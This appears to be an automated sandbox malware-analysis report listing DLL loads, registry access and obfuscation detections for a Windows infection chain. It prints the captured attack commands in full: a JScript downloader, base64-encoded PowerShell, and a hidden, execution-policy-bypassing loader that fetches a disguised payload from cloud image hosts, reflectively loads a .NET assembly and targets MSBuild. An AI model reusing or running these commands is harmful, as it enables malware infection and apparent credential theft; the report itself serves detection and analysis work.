                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pstorec.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: pstorec.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior

                      Data Obfuscation

                      barindex
                      JScript performs obfuscated calls to suspicious functions
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: wscript.exe C:\Windows\Temp\???2????4????4????5.js", "0", "true");IServerXMLHTTPRequest2.open("GET", "https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.status();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Windows\Temp\???2????4????4????5.js", "2");_Stream.Close();IWshShell3.Run("wscript.exe C:\Windows\Temp\???2????4????4????5.js", "0", "true");IFileSystem3.FileExists("C:\Windows\Temp\???2????4????4????5.js");IFileSystem3.DeleteFile("C:\Windows\Temp\???2????4????4????5.js")
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Run("powershell -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQA", "0", "true")
                      Found suspicious powershell code related to unpacking or dynamic code loading
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAHAAZQByAHYAYQBzAGkAdgBlAG4AZQBzAHMAZQBzACkAOwAkAHYAdQBsAGMAYQBuAGkAcwBtAHMAIAA9ACAAWw
                      Suspicious powershell command line found
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBl